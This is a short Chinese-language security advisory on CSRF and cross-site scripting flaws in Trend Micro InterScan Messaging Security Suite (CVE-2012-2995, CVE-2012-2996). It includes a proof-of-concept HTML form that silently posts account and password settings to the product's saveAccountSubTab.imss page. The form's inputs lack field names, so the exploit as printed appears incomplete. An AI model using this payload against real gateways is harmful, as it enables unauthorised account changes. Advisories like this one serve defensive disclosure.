发布日期:2012-09-14
更新日期:2012-09-15
受影响系统:
Trend Micro InterScan Messaging Security Suite
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 55542
CVE ID: CVE-2012-2995,CVE-2012-2996
InterScan Messaging Security Suite for SMTP (简称IMSS)是趋势科技为企业IT网络资源提供一套高性能、基于策略的网关安全过滤解决方案,架设于企业的 SMTP 对外网关上。
Trend Micro InterScan Messaging Security Suite存在多个安全漏洞,攻击者可利用这些漏洞窃取Cookie身份验证凭证、执行未授权操作、泄露敏感信息。
<*来源:Tom Gregory
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<body>
<form action="https://www.example.com/saveAccountSubTab.imss" method="POST">
<input type="hidden" value="on" />
<input type="hidden" value="1" />
<input type="hidden" value="quorra" />
<input type="hidden" value="quorra.123" />
<input type="hidden" value="quorra.123" />
<input type="hidden" value="saveAuth" />
<input type="hidden" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Trend Micro
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: